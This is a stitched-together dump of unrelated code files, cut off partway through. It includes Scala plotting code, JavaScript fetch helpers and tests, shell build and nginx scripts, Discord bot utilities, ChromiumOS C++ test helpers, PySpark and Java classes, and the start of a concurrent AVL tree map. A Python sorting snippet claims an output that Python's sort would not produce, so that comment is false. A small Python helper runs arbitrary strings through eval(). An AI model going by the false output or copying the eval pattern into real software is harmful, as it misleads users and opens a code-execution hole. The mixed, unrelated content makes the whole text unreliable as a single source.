val ctx = prepareCanvas(canvasId, plot.extent)
val paddedSize = Extent(plot.extent.width - paddingHack, plot.extent.height - paddingHack)
fit(plot padAll paddingHack / 2, paddedSize).draw(CanvasRenderContext(ctx))
}
/** Render the example plots to the specified canvas. */
@JSExport
def renderExample(canvasId: String): Unit = {
addExample(DemoPlots.simpleGroupedPlot)
addExample(DemoPlots.simpleContinuousPlot)
addExample(DemoPlots.simpleCartesianPlot)
addExample(DemoPlots.densityPlot)
addExample(DemoPlots.legendFeatures)
addExample(DemoPlots.axesTesting)
addExample(DemoPlots.functionPlot)
addExample(DemoPlots.markerPlot)
addExample(DemoPlots.scatterPlot)
addExample(DemoPlots.barChart)
addExample(DemoPlots.boxPlot)
addExample(DemoPlots.clusteredBoxPlot)
addExample(DemoPlots.facetedPlot)
addExample(DemoPlots.heatmap)
addExample(DemoPlots.marginalHistogram)
addExample(DemoPlots.clusteredBarChart)
addExample(DemoPlots.stackedBarChart)
addExample(DemoPlots.clusteredStackedBarChart)
}
private def addExample(plot: Drawable): Unit = {
val canvasId = UUID.randomUUID().toString
val screenWidth = dom.window.innerWidth
val screenHeight = dom.window.innerHeight
val canvas = dom.document.createElement("canvas").asInstanceOf[HTMLCanvasElement]
canvas.setAttribute("id", canvasId)
dom.document.body.appendChild(canvas)
val ctx = CanvasRenderContext(prepareCanvas(canvasId, Extent(screenWidth, screenHeight)))
plot.padAll(10).draw(ctx)
}
def renderPaletteExample(colors: Seq[Color]): Unit = {
val paletteID = "palette"
val div = dom.document.getElementById(paletteID)
colors.foreach { color =>
val element = dom.document.createElement("div")
element.setAttribute(
"style",
s"width: 40px; " +
s"height: 40px; " +
s"display: inline-block;" +
s"background-color: ${color.repr};")
div.appendChild(element)
}
}
private def prepareCanvas(
id: String,
extent: Extent
): CanvasRenderingContext2D = {
val ctx = Utils.getCanvasFromElementId(id)
val canvasResolutionScaleHack = 2
ctx.canvas.style.width = extent.width + "px"
ctx.canvas.style.height = extent.height + "px"
ctx.canvas.width = extent.width.toInt * canvasResolutionScaleHack
ctx.canvas.height = extent.height.toInt * canvasResolutionScaleHack
ctx.scale(canvasResolutionScaleHack, canvasResolutionScaleHack)
ctx
}
}
|
export const fetchOptions = {
method: 'GET',
credentials: 'include',
headers: {
'Content-Type': 'application/json',
},
};
export async function post(endpoint, data) {
const result = await fetch(endpoint, {
...fetchOptions,
method: 'POST',
body: JSON.stringify(data),
});
return await result.json();
}
export async function get(endpoint) {
const result = await fetch(endpoint, fetchOptions);
return await result.json();
}
|
'use strict';
const chai = require('chai');
const expect = chai.expect;
const sinonChai = require('sinon-chai');
chai.use(sinonChai);
const VoteCollector = require('../VoteCollector');
describe('Collect from result', () =>{
it('Vote only for "a"', (done) =>{
let res = VoteCollector.collectVotesFromResult({
rows: [
{
vote: 'a',
count: '12'
}
]
});
expect(res.a).to.equal(12);
expect(res.b).to.equal(0);
done();
});
it('Vote only for "b"', (done) =>{
var res = VoteCollector.collectVotesFromResult({
rows: [
{
vote: 'b',
count: '12'
}
]
});
expect(res.a).to.equal(0);
expect(res.b).to.equal(12);
done();
});
it('No vote', (done) =>{
var res = VoteCollector.collectVotesFromResult({
rows: [
]
});
expect(res.a).to.equal(0);
expect(res.b).to.equal(0);
done();
});
it('No vote with different properties', (done) =>{
var res = VoteCollector.collectVotesFromResult({
rows: [
{
vote: 'C',
count: '12'
}
]
});
expect(res.a).to.equal(0);
expect(res.b).to.equal(0);
done();
});
it('vote to two parties', (done) =>{
var res = VoteCollector.collectVotesFromResult({
rows: [
{
vote: 'a',
count: '1'
},
{
vote: 'b',
count: '2'
}
]
});
expect(res.a).to.equal(1);
expect(res.b).to.equal(2);
done();
});
it('vote to two parties', (done) =>{
try{
VoteCollector.collectVotesFromResult();
done(new Error('Validation should have failed'));
}catch(e){
console.log(JSON.stringify(e));
expect(e.name).to.contain('TypeError');
done();
}
});
});
|
sentence = "The quick brown fox jumped over the lazy dog."
# Split sentence into words
words = sentence.split()
# Sort list of words alphabetically
words.sort()
# Print sorted list of words
print(words)
# Output: ['brown', 'dog.', 'fox', 'The', 'jumped', 'lazy', 'over', 'quick', 'the'] |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
if [[ ! -f config.sh ]]; then
echo "You must source config.sh from within its own directory"
return
fi
export SOURCE_DIR=$(pwd)
export BUILD_DIR=$SOURCE_DIR/${1:-build}
export INSTALL_DIR=$SOURCE_DIR/${2:-install}
PYTHON_BIN=`type -P python || type -P python3`
PYTHON_LIB=$(${PYTHON_BIN} -c "from distutils.sysconfig import get_python_lib; print(get_python_lib(prefix='$INSTALL_DIR'))")
export PYTHONPATH=$PYTHON_LIB:$PYTHONPATH
export PATH=$INSTALL_DIR/sbin:$INSTALL_DIR/bin:$SOURCE_DIR/bin:$PATH
|
#!/bin/sh
set -e
if [ -z $BASIC_AUTH_USERNAME ]; then
echo >&2 "BASIC_AUTH_USERNAME must be set"
exit 1
fi
if [ -z $BASIC_AUTH_PASSWORD ]; then
echo >&2 "BASIC_AUTH_PASSWORD must be set"
exit 1
fi
if [ -z $PROXY_PASS ]; then
echo >&2 "PROXY_PASS must be set"
exit 1
fi
export AUTHORIZATION_HEADER="Basic $(echo -n "${BASIC_AUTH_USERNAME}:${BASIC_AUTH_PASSWORD}" | base64)"
sed \
-e "s/##WORKER_PROCESSES##/$WORKER_PROCESSES/g" \
-e "s/##SERVER_NAME##/$SERVER_NAME/g" \
-e "s/##PORT##/$PORT/g" \
-e "s|##PROXY_PASS##|$PROXY_PASS|g" \
-e "s|##AUTHORIZATION_HEADER##|$AUTHORIZATION_HEADER|g" \
nginx.conf.tmpl > /etc/nginx/nginx.conf
nginx -g "daemon off;"
|
angular.module('ticketmonster').factory('PerformanceResource', function($resource){
var resource = $resource('../rest/performances/:PerformanceId',{PerformanceId:'@id'},{'queryAll':{method:'GET',isArray:true},'query':{method:'GET',isArray:false},'update':{method:'PUT'}});
return resource;
}); |
const yes = ['true', 'yes', 'y', 'да', 'ye', 'yeah', 'yup', 'yea', 'ya', 'yas', 'yuh', 'yee', 'i guess', 'fosho', 'yis', 'hai', 'da', 'si', 'sí', 'oui', 'はい', 'correct', 'perhaps', 'absolutely', 'sure'];
const no = ['false', 'no', 'n', 'nah', 'eat shit', 'nah foo', 'nope', 'nop', 'die', 'いいえ', 'non', 'fuck off', 'absolutely not'];
module.exports = client => {
client.load = async command => {
const props = require(`../commands/${command}`);
if (!props.conf || !props.help) return client.logger.error(`${command} failed to load as it is missing required command configuration`);
if (props.conf.enabled !== true) return client.logger.log(`${props.help.name} is disabled.`);
client.logger.log(`Loading Command: ${props.help.name}. 👌`);
if (props.help.name !== command.split('.')[0]) client.logger.warn(`File name ${command} has a different command name ${props.help.name}`);
client.commands.set(props.help.name, props);
props.conf.aliases.forEach(alias => {
client.logger.log(`Loading Alias: ${alias}. 👌`);
client.aliases.set(alias, props.help.name);
});
};
client.unloadCommand = async commandName => {
let command;
if (client.commands.has(commandName)) {
command = client.commands.get(commandName);
} else if (client.aliases.has(commandName)) {
command = client.commands.get(client.aliases.get(commandName));
}
if (!command) return `The command \`${commandName}\` doesn't seem to exist, nor is it an alias. Try again!`;
client.logger.log(`Unloading Command: ${command.help.name}. 👌`);
client.commands.delete(command.help.name);
command.conf.aliases.forEach(alias => {
client.logger.log(`Unloading Alias: ${alias}. 👌`);
client.aliases.delete(alias);
});
delete require.cache[require.resolve(`../commands/${command.help.name}.js`)];
return `Successfully unloaded ${command.help.name}`;
};
/*
PERMISSION LEVEL FUNCTION
This is a very basic permission system for commands which uses "levels"
0 = member
2 = mod
3 = admin
4 = guild owner
10 = bot owner
*/
client.elevation = message => {
let permlvl = 0;
if (message.member.hasPermission('MANAGE_MESSAGES'))
permlvl = 2;
if (message.member.hasPermission('ADMINISTRATOR') || message.member.hasPermission('MANAGE_GUILD'))
permlvl = 3;
if (message.author.id == message.guild.ownerID) permlvl = 4;
if (message.author.id === client.settings.owner_id) permlvl = 10;
return permlvl;
};
client.verify = async (channel, user, { time = 30000, extraYes = [], extraNo = [] } = {}) => {
if (client.blacklist.includes(user.id)) return channel.send(`${user.tag} is currently blacklisted`);
const filter = res => {
const value = res.content.toLowerCase();
return (user ? res.author.id === user.id : true)
&& (yes.includes(value) || no.includes(value) || extraYes.includes(value) || extraNo.includes(value));
};
const verify = await channel.awaitMessages(filter, {
max: 1,
time,
errors: ['time']
});
if (!verify.size) return 0;
const choice = verify.first().content.toLowerCase();
if (yes.includes(choice) || extraYes.includes(choice)) return true;
if (no.includes(choice) || extraNo.includes(choice)) return false;
return false;
};
/*
MESSAGE CLEAN FUNCTION
"Clean" removes @everyone pings, as well as tokens, and makes code blocks
escaped so they're shown more easily. As a bonus it resolves promises
and stringifies objects!
This is mostly only used by the Eval and Exec commands.
*/
client.clean = async (text) => {
if (text && text.constructor.name == 'Promise')
text = await text;
if (typeof text !== 'string')
text = require('util').inspect(text, {depth: 1});
text = text
.replace(/@/g, '@' + String.fromCharCode(8203))
.replace(client.token, 'NO TOKEN');
return text;
};
/* MISCELANEOUS NON-CRITICAL FUNCTIONS */
// EXTENDING NATIVE TYPES IS BAD PRACTICE. Why? Because if JavaScript adds this
// later, this conflicts with native code. Also, if some other lib you use does
// this, a conflict also occurs. KNOWING THIS however, the following 2 methods
// are, we feel, very useful in code.
// <String>.toPropercase() returns a proper-cased string such as:
// "<NAME> a little lamb".toProperCase() returns "<NAME> A Little Lamb"
Object.defineProperty(String.prototype, 'toProperCase', {
value: function() {
return this.replace(/([^\W_]+[^\s-]*) */g, (txt) => txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase());
}
});
// <Array>.random() returns a single random element from an array
// [1, 2, 3, 4, 5].random() can return 1, 2, 3, 4 or 5.
Object.defineProperty(Array.prototype, 'random', {
value: function() {
return this[Math.floor(Math.random() * this.length)];
}
});
Object.defineProperty(Array.prototype, 'shuffle', {
value: function() {
const arr = this.slice(0);
for (let i = arr.length - 1; i >= 0; i--) {
const j = Math.floor(Math.random() * (i + 1));
const temp = arr[i];
arr[i] = arr[j];
arr[j] = temp;
}
return arr;
}
});
client.formatNumber = (number, minimumFractionDigits = 0) => {
return Number.parseFloat(number).toLocaleString(undefined, {
minimumFractionDigits,
maximumFractionDigits: 2
});
};
// `await client.wait(1000);` to "pause" for 1 second.
client.wait = require('util').promisify(setTimeout);
// These 2 process methods will catch exceptions and give *more details* about the error and stack trace.
process.on('uncaughtException', err => {
client.logger.error(`UNCAUGHT EXCEPTION: ${err.message}`);
client.logger.error(err.stack);
process.exit(1);
});
process.on('unhandledRejection', err => {
client.logger.error(`UNHANDLED REJECTION: ${err.message}`);
client.logger.error(err.stack);
});
};
|
// Copyright 2020 The Chromium OS Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "dlcservice/test_utils.h"
#include <string>
#include <utility>
#include <vector>
#include <base/files/file_path.h>
#include <base/files/file_util.h>
#include <base/files/scoped_temp_dir.h>
#include <dbus/dlcservice/dbus-constants.h>
#include <gmock/gmock.h>
#include <gtest/gtest.h>
#include <imageloader/dbus-proxy-mocks.h>
#include <metrics/metrics_library_mock.h>
#include <update_engine/dbus-constants.h>
#include <update_engine/dbus-proxy-mocks.h>
#include "dlcservice/boot/boot_slot.h"
#include "dlcservice/dlc.h"
#include "dlcservice/metrics.h"
#include "dlcservice/system_state.h"
#include "dlcservice/utils.h"
using std::string;
using std::vector;
using testing::_;
using testing::Return;
using testing::SetArgPointee;
using testing::StrictMock;
namespace dlcservice {
const char kFirstDlc[] = "first-dlc";
const char kSecondDlc[] = "second-dlc";
const char kThirdDlc[] = "third-dlc";
const char kPackage[] = "package";
const char kDefaultOmahaUrl[] = "http://foo-url";
BaseTest::BaseTest() {
// Create mocks with default behaviors.
mock_image_loader_proxy_ =
std::make_unique<StrictMock<ImageLoaderProxyMock>>();
mock_image_loader_proxy_ptr_ = mock_image_loader_proxy_.get();
mock_update_engine_proxy_ =
std::make_unique<StrictMock<UpdateEngineProxyMock>>();
mock_update_engine_proxy_ptr_ = mock_update_engine_proxy_.get();
mock_session_manager_proxy_ =
std::make_unique<StrictMock<SessionManagerProxyMock>>();
mock_session_manager_proxy_ptr_ = mock_session_manager_proxy_.get();
mock_boot_device_ = std::make_unique<MockBootDevice>();
mock_boot_device_ptr_ = mock_boot_device_.get();
EXPECT_CALL(*mock_boot_device_, GetBootDevice())
.WillOnce(Return("/dev/sdb5"));
ON_CALL(*mock_boot_device_, IsRemovableDevice(_))
.WillByDefault(Return(false));
EXPECT_CALL(*mock_boot_device_, IsRemovableDevice(_)).Times(1);
}
void BaseTest::SetUp() {
loop_.SetAsCurrent();
SetUpFilesAndDirectories();
auto mock_metrics = std::make_unique<testing::StrictMock<MockMetrics>>();
mock_metrics_ = mock_metrics.get();
auto mock_system_properties =
std::make_unique<testing::StrictMock<MockSystemProperties>>();
mock_system_properties_ = mock_system_properties.get();
SystemState::Initialize(
std::move(mock_image_loader_proxy_), std::move(mock_update_engine_proxy_),
std::move(mock_session_manager_proxy_), &mock_state_change_reporter_,
std::make_unique<BootSlot>(std::move(mock_boot_device_)),
std::move(mock_metrics), std::move(mock_system_properties),
manifest_path_, preloaded_content_path_, content_path_, prefs_path_,
users_path_, &clock_,
/*for_test=*/true);
}
void BaseTest::SetUpFilesAndDirectories() {
// Initialize DLC path.
CHECK(scoped_temp_dir_.CreateUniqueTempDir());
manifest_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "rootfs");
preloaded_content_path_ =
JoinPaths(scoped_temp_dir_.GetPath(), "preloaded_stateful");
content_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "stateful");
prefs_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "var_lib_dlcservice");
users_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "users");
mount_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "mount");
base::FilePath mount_root_path = JoinPaths(mount_path_, "root");
base::CreateDirectory(manifest_path_);
base::CreateDirectory(preloaded_content_path_);
base::CreateDirectory(content_path_);
base::CreateDirectory(prefs_path_);
base::CreateDirectory(users_path_);
base::CreateDirectory(mount_root_path);
testdata_path_ = JoinPaths(getenv("SRC"), "testdata");
// Create DLC manifest sub-directories.
for (auto&& id : {kFirstDlc, kSecondDlc, kThirdDlc}) {
base::CreateDirectory(JoinPaths(manifest_path_, id, kPackage));
base::CopyFile(JoinPaths(testdata_path_, id, kPackage, kManifestName),
JoinPaths(manifest_path_, id, kPackage, kManifestName));
}
}
int64_t GetFileSize(const base::FilePath& path) {
int64_t file_size;
EXPECT_TRUE(base::GetFileSize(path, &file_size));
return file_size;
}
base::FilePath BaseTest::SetUpDlcPreloadedImage(const DlcId& id) {
imageloader::Manifest manifest;
dlcservice::GetDlcManifest(manifest_path_, id, kPackage, &manifest);
base::FilePath image_path =
JoinPaths(preloaded_content_path_, id, kPackage, kDlcImageFileName);
CreateFile(image_path, manifest.size());
EXPECT_TRUE(base::PathExists(image_path));
string data(manifest.size(), '1');
WriteToImage(image_path, data);
return image_path;
}
// Will create |path/|id|/|package|/dlc_[a|b]/dlc.img files.
void BaseTest::SetUpDlcWithSlots(const DlcId& id) {
imageloader::Manifest manifest;
dlcservice::GetDlcManifest(manifest_path_, id, kPackage, &manifest);
// Create DLC content sub-directories and empty images.
for (const auto& slot : {BootSlot::Slot::A, BootSlot::Slot::B}) {
base::FilePath image_path =
GetDlcImagePath(content_path_, id, kPackage, slot);
CreateFile(image_path, manifest.preallocated_size());
}
}
void BaseTest::InstallWithUpdateEngine(const vector<string>& ids) {
for (const auto& id : ids) {
imageloader::Manifest manifest;
dlcservice::GetDlcManifest(manifest_path_, id, kPackage, &manifest);
base::FilePath image_path = GetDlcImagePath(
content_path_, id, kPackage, SystemState::Get()->active_boot_slot());
string data(manifest.size(), '1');
WriteToImage(image_path, data);
}
}
void BaseTest::SetMountPath(const string& mount_path_expected) {
ON_CALL(*mock_image_loader_proxy_ptr_, LoadDlcImage(_, _, _, _, _, _))
.WillByDefault(
DoAll(SetArgPointee<3>(mount_path_expected), Return(true)));
}
} // namespace dlcservice
|
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
# Create a Spark session
spark = SparkSession.builder.appName("FilterDataFrame").getOrCreate()
# Read the CSV file into a DataFrame
df = spark.read.csv("input.csv", header=True, inferSchema=True)
# Filter the DataFrame and count the records
filtered_count = df.filter((df.Profession == 'Writer') & (df.Salary < 100000)).count()
# Print the count of filtered records
print(filtered_count) |
function findCombinations(arr) {
let combinations = [];
// Iterate over the given array
for (let i = 0; i < arr.length; i++) {
let first = arr[i];
// Iterate again over the array
for (let j = i + 1; j < arr.length; j++) {
let second = arr[j];
// Iterate third time over the array
for (let k = j + 1; k < arr.length; k++) {
let third = arr[k];
// Push each possible combination
combinations.push([first, second, third]);
}
}
}
return combinations;
}
let arr = [1,2,3,4,5];
console.log(findCombinations(arr));
// Output: [[1,2,3],[1,2,4],[1,2,5],[1,3,4],[1,3,5],[1,4,5],
// [2,3,4],[2,3,5],[2,4,5],[3,4,5]] |
#!/bin/sh
mutagen create \
--symlink-mode ignore \
src docker://$(docker-compose ps -q workspace)/workspace/src
|
<reponame>ch1huizong/learning
def logical_lines(physical_lines, joiner=''.join, separator=''):
return joiner(physical_lines).replace('\\\n', separator).splitlines(True)
|
<filename>src/main/java/vcs/citydb/wfs/kvp/DropStoredQueryReader.java
package vcs.citydb.wfs.kvp;
import net.opengis.wfs._2.DropStoredQueryType;
import vcs.citydb.wfs.config.WFSConfig;
import vcs.citydb.wfs.exception.KVPParseException;
import vcs.citydb.wfs.exception.WFSException;
import vcs.citydb.wfs.exception.WFSExceptionCode;
import vcs.citydb.wfs.kvp.parser.StringParser;
import java.util.Map;
public class DropStoredQueryReader extends KVPRequestReader {
private final BaseRequestReader baseRequestReader;
public DropStoredQueryReader(Map<String, String> parameters, WFSConfig wfsConfig) {
super(parameters, wfsConfig);
baseRequestReader = new BaseRequestReader();
}
@Override
public DropStoredQueryType readRequest() throws WFSException {
DropStoredQueryType wfsRequest = new DropStoredQueryType();
baseRequestReader.read(wfsRequest, parameters);
try {
if (parameters.containsKey(KVPConstants.STOREDQUERY_ID))
wfsRequest.setId(new StringParser().parse(KVPConstants.STOREDQUERY_ID, parameters.get(KVPConstants.STOREDQUERY_ID)));
} catch (KVPParseException e) {
throw new WFSException(WFSExceptionCode.INVALID_PARAMETER_VALUE, e.getMessage(), e.getParameter(), e.getCause());
}
return wfsRequest;
}
@Override
public String getOperationName() {
return KVPConstants.DROP_STORED_QUERY;
}
} |
<filename>src/editors/LevelEditor/iniStreamImpl.cpp
#include "stdafx.h"
#pragma hdrstop
#include "iniStreamImpl.h"
LPCSTR SIniFileStream::gen_name()
{
++counter;
sprintf(tmp_buff,"%06d",counter);
return tmp_buff;
}
void SIniFileStream::w_float( float a)
{
ini->w_float(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_vec3( const Fvector& a)
{
ini->w_fvector3(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_vec4( const Fvector4& a)
{
ini->w_fvector4(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u64( u64 a)
{
ini->w_u64(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s64( s64 a)
{
ini->w_s64(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u32( u32 a)
{
ini->w_u32(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s32( s32 a)
{
ini->w_s32(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u16( u16 a)
{
ini->w_u16(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s16( s16 a)
{
ini->w_s16(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u8( u8 a)
{
ini->w_u8(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s8( s8 a)
{
ini->w_s8(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_stringZ( LPCSTR S)
{
string4096 buff;
sprintf_s (buff, sizeof(buff),"\"%s\"",(S)?S:"");
ini->w_string(sect.c_str(),gen_name(),buff);
//. Msg("[%s] [%s]=[%s]",sect.c_str(),tmp_buff,buff);
}
void SIniFileStream::r_vec3(Fvector& A)
{
A = ini->r_fvector3(sect.c_str(),gen_name());
}
void SIniFileStream::r_vec4(Fvector4& A)
{
A = ini->r_fvector4(sect.c_str(),gen_name());
}
void SIniFileStream::r_float(float& A)
{
A = ini->r_float(sect.c_str(),gen_name());
}
void SIniFileStream::r_u8(u8& A)
{
A = ini->r_u8(sect.c_str(),gen_name());
}
void SIniFileStream::r_u16(u16& A)
{
A = ini->r_u16(sect.c_str(),gen_name());
}
void SIniFileStream::r_u32(u32& A)
{
A = ini->r_u32(sect.c_str(),gen_name());
}
void SIniFileStream::r_u64(u64& A)
{
A = ini->r_u64(sect.c_str(),gen_name());
}
void SIniFileStream::r_s8(s8& A)
{
A = ini->r_s8(sect.c_str(),gen_name());
}
void SIniFileStream::r_s16(s16& A)
{
A = ini->r_s16(sect.c_str(),gen_name());
}
void SIniFileStream::r_s32(s32& A)
{
A = ini->r_s32(sect.c_str(),gen_name());
}
void SIniFileStream::r_s64(s64& A)
{
A = ini->r_s64(sect.c_str(),gen_name());
}
void SIniFileStream::r_string(LPSTR dest, u32 dest_size)
{
shared_str S;
S = ini->r_string_wb(sect.c_str(),gen_name());
R_ASSERT(dest_size>=S.size());
strcpy_s(dest, dest_size, S.c_str());
//. Msg("[%s] [%s]=[%s]",sect.c_str(),tmp_buff,dest);
}
void SIniFileStream::skip_stringZ()
{
gen_name();
}
|
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.login = void 0;
var login = {
"viewBox": "0 0 20 20",
"children": [{
"name": "path",
"attribs": {
"d": "M14,10L8,5v3H1v4h7v3L14,10z M17,17H9v2h8c1.1,0,2-0.9,2-2V3c0-1.1-0.9-2-2-2H9v2h8V17z"
}
}]
};
exports.login = login; |
package wearable.hotelbeds.shared.event;
import java.io.Serializable;
import java.math.BigDecimal;
import java.util.Date;
/**
* Created by Zavierazo on 06/10/2015.
*/
public class EventInfoBean implements Serializable{
private String id;
private String name;
private Date timeStart;
private Date timeEnd;
private BigDecimal price;
private String imageUrl;
private String shortDescription;
public EventInfoBean() {
}
public EventInfoBean(String id, String name, Date timeStart, Date timeEnd, BigDecimal price, String imageUrl, String shortDescription) {
this.id = id;
this.name = name;
this.timeStart = timeStart;
this.timeEnd = timeEnd;
this.price = price;
this.imageUrl = imageUrl;
this.shortDescription = shortDescription;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public Date getTimeStart() {
return timeStart;
}
public void setTimeStart(Date timeStart) {
this.timeStart = timeStart;
}
public Date getTimeEnd() {
return timeEnd;
}
public void setTimeEnd(Date timeEnd) {
this.timeEnd = timeEnd;
}
public String getId() {
return id;
}
public void setId(String id) {
this.id = id;
}
public BigDecimal getPrice() {
return price;
}
public void setPrice(BigDecimal price) {
this.price = price;
}
public String getImageUrl() {
return imageUrl;
}
public void setImageUrl(String imageUrl) {
this.imageUrl = imageUrl;
}
public String getShortDescription() {
return shortDescription;
}
public void setShortDescription(String shortDescription) {
this.shortDescription = shortDescription;
}
}
|
def evaluate_code(code_snippet):
try:
result = eval(code_snippet)
return result
except Exception as e:
return f"Error: {e}"
# Test cases
print(evaluate_code("True")) # Output: True
print(evaluate_code("2 + 3")) # Output: 5
print(evaluate_code("10 / 0")) # Output: Error: division by zero |
/*
* Copyright (c) 2009 Stanford University, unless otherwise specified.
* All rights reserved.
*
* This software was developed by the Pervasive Parallelism Laboratory of
* Stanford University, California, USA.
*
* Permission to use, copy, modify, and distribute this software in source
* or binary form for any purpose with or without fee is hereby granted,
* provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* 3. Neither the name of Stanford University nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
package algorithms.snaptree;
import java.io.*;
import java.util.*;
import java.util.concurrent.ConcurrentNavigableMap;
// TODO: optimized buildFromSorted
// TODO: submap.clone()
/** A concurrent AVL tree with fast cloning, based on the algorithm of Bronson,
* Casper, Chafi, and Olukotun, "A Practical Concurrent Binary Search Tree"
* published in PPoPP'10. To simplify the locking protocols rebalancing work
* is performed in pieces, and some removed keys are be retained as routing
* nodes in the tree.
*
* <p>This data structure honors all of the contracts of {@link
* java.util.concurrent.ConcurrentSkipListMap}, with the additional contract
* that clone, size, toArray, and iteration are linearizable (atomic).
*
* <p>The tree uses optimistic concurrency control. No locks are usually
* required for get, containsKey, firstKey, firstEntry, lastKey, or lastEntry.
* Reads are not lock free (or even obstruction free), but obstructing threads
* perform no memory allocation, system calls, or loops, which seems to work
* okay in practice. All of the updates to the tree are performed in fixed-
* size blocks, so restoration of the AVL balance criteria may occur after a
* change to the tree has linearized (but before the mutating operation has
* returned). The tree is always properly balanced when quiescent.
*
* <p>To clone the tree (or produce a snapshot for consistent iteration) the
* root node is marked as shared, which must be (*) done while there are no
* pending mutations. New mutating operations are blocked if a mark is
* pending, and when existing mutating operations are completed the mark is
* made.
* <em>* - It would be less disruptive if we immediately marked the root as
* shared, and then waited for pending operations that might not have seen the
* mark without blocking new mutations. This could result in imbalance being
* frozen into the shared portion of the tree, though. To minimize the
* problem we perform the mark and reenable mutation on whichever thread
* notices that the entry count has become zero, to reduce context switches on
* the critical path.</em>
*
* <p>The same multi-cache line data structure required for efficiently
* tracking the entry and exit for mutating operations is used to maintain the
* current size of the tree. This means that the size can be computed by
* quiescing as for a clone, but without doing any marking.
*
* <p>Range queries such as higherKey are not amenable to the optimistic
* hand-over-hand locking scheme used for exact searches, so they are
* implemented with pessimistic concurrency control. Mutation can be
* considered to acquire a lock on the map in Intention-eXclusive mode, range
* queries, size(), and root marking acquire the lock in Shared mode.
*
* @author <NAME>
*/
public class SnapTreeMap<K,V> extends AbstractMap<K,V> implements ConcurrentNavigableMap<K,V>, Cloneable, Serializable {
private static final long serialVersionUID = 9052695062720473599L;
/** If false, null values will trigger a NullPointerException. When false,
* this map acts exactly like a ConcurrentSkipListMap, except for the
* running time of the methods. The ability to get a snapshot reduces the
* potential ambiguity between null values and absent entries, so I'm not
* sure what the default should be.
*/
static final boolean AllowNullValues = false;
/** This is a special value that indicates the presence of a null value,
* to differentiate from the absence of a value. Only used when
* {@link #AllowNullValues} is true.
*/
static final Object SpecialNull = new Object();
/** This is a special value that indicates that an optimistic read
* failed.
*/
static final Object SpecialRetry = new Object();
/** The number of spins before yielding. */
static final int SpinCount = Integer.parseInt(System.getProperty("snaptree.spin", "100"));
/** The number of yields before blocking. */
static final int YieldCount = Integer.parseInt(System.getProperty("snaptree.yield", "0"));
// we encode directions as characters
static final char Left = 'L';
static final char Right = 'R';
/** An <tt>OVL</tt> is a version number and lock used for optimistic
* concurrent control of some program invariant. If {@link #isShrinking}
* then the protected invariant is changing. If two reads of an OVL are
* performed that both see the same non-changing value, the reader may
* conclude that no changes to the protected invariant occurred between
* the two reads. The special value UnlinkedOVL is not changing, and is
* guaranteed to not result from a normal sequence of beginChange and
* endChange operations.
* <p>
* For convenience <tt>endChange(ovl) == endChange(beginChange(ovl))</tt>.
*/
static long beginChange(long ovl) { return ovl | 1; }
static long endChange(long ovl) { return (ovl | 3) + 1; }
static final long UnlinkedOVL = 2;
static boolean isShrinking(long ovl) { return (ovl & 1) != 0; }
static boolean isUnlinked(long ovl) { return (ovl & 2) != 0; }
static boolean isShrinkingOrUnlinked(long ovl) { return (ovl & 3) != 0L; }
private static class Node<K,V> implements Map.Entry<K,V> {
final K key;
volatile int height;
/** null means this node is conceptually not present in the map.
* SpecialNull means the value is null.
*/
volatile Object vOpt;
volatile Node<K,V> parent;
volatile long shrinkOVL;
volatile Node<K,V> left;
volatile Node<K,V> right;
Node(final K key,
final int height,
final Object vOpt,
final Node<K,V> parent,
final long shrinkOVL,
final Node<K,V> left,
final Node<K,V> right)
{
this.key = key;
this.height = height;
this.vOpt = vOpt;
this.parent = parent;
